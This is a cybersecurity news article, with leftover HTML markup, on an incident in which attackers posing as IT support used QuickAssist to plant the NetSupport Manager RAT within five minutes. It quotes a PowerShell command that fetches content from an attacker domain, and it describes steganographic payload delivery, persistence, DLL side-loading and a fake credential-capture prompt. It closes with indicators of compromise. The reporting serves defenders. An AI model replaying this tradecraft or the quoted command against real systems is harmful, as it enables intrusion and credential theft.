Threat actors successfully compromised corporate systems within just five minutes using a combination of social engineering<\/a> tactics and rapid PowerShell execution.\u00a0<\/p>\n The incident, investigated by NCC Group\u2019s Digital Forensics and Incident Response (DFIR) team, demonstrates how cybercriminals are weaponizing trusted business applications to bypass traditional security measures.<\/p>\n The threat actors executed a carefully orchestrated campaign targeting approximately twenty users by impersonating IT support personnel.\u00a0<\/p>\n Successfully convincing two victims to grant remote access, the attackers exploited Windows\u2019 native QuickAssist.exe remote support tool<\/a> to establish an initial foothold.\u00a0<\/p>\n Within 300 seconds of gaining access, the adversaries deployed a series of PowerShell commands that downloaded offensive tooling and established multiple persistence mechanisms.<\/p>\n The attack sequence began with clipboard manipulation using the command (curl hxxps:\/\/resutato[.]com\/2-4.txt).Content | Set-Clipboard, followed by the execution of obfuscated PowerShell scripts, reads the report<\/a>.<\/p>\n The primary payload download occurred through a sophisticated steganographic technique, where malicious code was embedded within a JPEG file hosted at hxxps:\/\/resutato[.]com\/b2\/res\/nh2.jpg.\u00a0<\/p>\n The script employed XOR decryption with a 4-byte marker (0x31, 0x67, 0xBE, 0xE1) to extract and reconstruct a ZIP archive containing NetSupport Manager components, disguised as \u201cNetHealth\u201d software.<\/p>\n The attackers demonstrated advanced tradecraft by implementing multiple persistence mechanisms.\u00a0<\/p>\n They created scheduled tasks configured to execute every five minutes using regsvr32.exe with randomized DLL names, and established registry persistence via HKCUSOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUNNETHEALTH.\u00a0<\/p>\n The malware utilized legitimate binaries like msiexec.exe and GenUp.exe for DLL side-loading attacks, deploying the trojanized libcurl.dll component.<\/p>\n Perhaps most concerning was the deployment of a sophisticated credential harvesting GUI that mimicked legitimate system authentication prompts.\u00a0<\/p>\n The PowerShell-based interface (C:Users{username}Videosl.ps1) created a full-screen overlay with a convincing \u201cSystem Credential Verification\u201d dialog, capturing plaintext credentials to $env:TEMPcred.txt.\u00a0<\/p>\n The interface disabled critical Windows functions, including taskbar access and various keyboard shortcuts, to prevent user escape.<\/p>\n Command and Control communication<\/a> was established with multiple domains, including resutato[.]com and nimbusvaults[.]com, enabling remote management capabilities.\u00a0<\/p>\n The attack\u2019s success underscores the critical need for enhanced user awareness training and robust incident response capabilities, as even brief security breaches can result in significant organizational compromise.<\/p>\n Equip your SOC with full access to the latest threat data from ANY.RUN TI Lookup<\/strong> that can Improve incident response -> Get 14-day\u00a0Free\u00a0Trial<\/a><\/strong><\/p>\n The post Hackers Uses Social Engineering Attack to Gain Remote Access in 300 Seconds<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\nKey Takeaways<\/mark><\/strong>
1. Hackers impersonated IT support to gain QuickAssist remote access and compromised it in under 5 minutes.
2. Deployed NetSupport Manager RAT.
3. Legitimate tools weaponized through social engineering, requiring better user training.<\/pre>\nQuickAssist Attack: 300-Second Compromise<\/strong><\/h2>\n
![\"\"](\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXepPANtMb2-toLa7_Tf-m8I3H42Ibct987SveWk0Ybt7y2zRPD3itdZ6cBlv-5XYHeti0_EUrMSS0MYOL6qDUTOHP2l_eJcdNWIsleEW3uVYO651jUyQwn3qtlNGGXpLanYrNRL?key=6YugqrMvWxLdjnp_E2agFg\")
![\"\"](\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXc5rHFvwqPW-bHatfwuCbZTeGy5C5_rf8_ZIT4GQNx5f-LkOsAya99Juaj7MxXZnOcbuFoN_96tVh8J1oIVLzymKlwUOP--BV7XzwcWAH46LUhfV2H5oYenTp4p-0yLa5nhQwPylg?key=6YugqrMvWxLdjnp_E2agFg\")
\u00a0Credential Harvesting<\/strong><\/h2>\n
\n\n
\n \nValue<\/th>\n Type<\/th>\n Comment<\/th>\n<\/tr>\n<\/thead>\n \n resutato[.]com<\/code><\/td>\nDomain<\/td>\n Command & Control<\/td>\n<\/tr>\n \n hxxps:\/\/resutato[.]com\/b2\/st\/st[.]php<\/code><\/td>\nURL<\/td>\n Command & Control + Malware download<\/td>\n<\/tr>\n \n hxxps:\/\/resutato[.]com\/2-4.txt<\/code><\/td>\nURL<\/td>\n Malware download<\/td>\n<\/tr>\n \n hxxp:\/\/196.251.69[.]195<\/code><\/td>\nURL<\/td>\n Malware download<\/td>\n<\/tr>\n \n 196.251.69[.]195<\/code><\/td>\nIP Address<\/td>\n Malware download<\/td>\n<\/tr>\n \n 4e57ae0cc388baffa98dd755ac77ee3ca70f2eaa<\/code><\/td>\nSHA1<\/td>\n libcurl.dll<\/td>\n<\/tr>\n \n df3125365d72abf965368248295a53da1cdceabe<\/code><\/td>\nSHA1<\/td>\n Update.msi<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n